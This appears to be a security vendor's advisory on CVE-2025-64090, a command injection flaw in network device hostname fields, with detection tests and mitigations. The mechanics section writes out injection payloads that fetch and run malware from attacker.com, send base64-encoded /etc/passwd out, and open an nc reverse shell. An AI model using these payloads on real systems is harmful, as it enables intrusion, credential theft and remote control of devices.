CVE-2025-64090: Command Injection via Device Hostname Field Enables Full System Compromise
Authenticated attackers can execute arbitrary OS commands by injecting shell metacharacters into the device hostname field. CVSS 10.0. A common vulnerability class in network devices and embedded systems that consistently yields critical impact.
| Field | Detail |
|---|---|
| CVE ID | CVE-2025-64090 |
| Severity | CRITICAL (CVSS 3.1: 10.0) |
| Vulnerability Type | OS Command Injection (CWE-78) |
| Published | January 9, 2026 |
| Authentication Required | Yes (low privilege) |
| Attack Vector | Network |
What Is CVE-2025-64090?
CVE-2025-64090 is a command injection vulnerability where the device hostname configuration field is passed unsanitized to an underlying shell command. By inserting shell metacharacters (;, |, `, $()) into the hostname value, authenticated attackers can break out of the intended command context and execute arbitrary OS commands with the privileges of the device's management process — typically root.
This vulnerability class is endemic in network devices, IoT hardware, routers, firewalls, and embedded Linux systems where web-based management interfaces build shell commands from user-supplied configuration values without proper sanitization.
⚠ Low Barrier to Full Compromise
Any authenticated user — including low-privilege accounts — can achieve root-level command execution. In environments where default or weak credentials exist, this becomes effectively unauthenticated exploitation.
Command Injection Mechanics
# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)
# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`
# Subshell:
$(id > /var/www/html/pwned.txt)
# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh
Affected Versions
Consult the vendor advisory for specific hardware models and firmware versions. Network devices with web-based management interfaces that expose hostname configuration are the primary risk surface.
Detection Methods
Testing for Hostname Injection
# Manual test: submit hostname with command injection payload # Use time-delay to confirm blind injection POST /admin/network/hostname hostname=test%3Bsleep%205 # If response delays ~5 seconds: vulnerable # Out-of-band confirmation: hostname=test%3Bnslookup+attacker.burpcollaborator.net
🔍 KENSAI Detection: KENSAI's device security scanner tests management interface fields including hostname, DNS, NTP, and SNMP configuration for OS command injection. CVE-2025-64090 patterns are included in network device assessment profiles.
Mitigation Steps
- Apply vendor firmware update immediately.
- Input validation: Hostname fields should only accept alphanumeric characters and hyphens (RFC 952/1123 compliant).
- Use safe APIs: Replace shell command construction with system calls that accept argument arrays (no shell interpolation).
- Restrict management interface: Limit access to management UI to trusted IP ranges via firewall rules.
- Change default credentials: Ensure all management accounts use strong, unique passwords.
- Network segmentation: Isolate management interfaces from user-accessible networks.
Command Injection in Your Network Devices?
KENSAI scans network devices and management interfaces for command injection vulnerabilities including CVE-2025-64090. Identify vulnerable devices before attackers gain a foothold.
Scan Network Devices FreePublished by the KENSAI Security Research Team · More CVE Analysis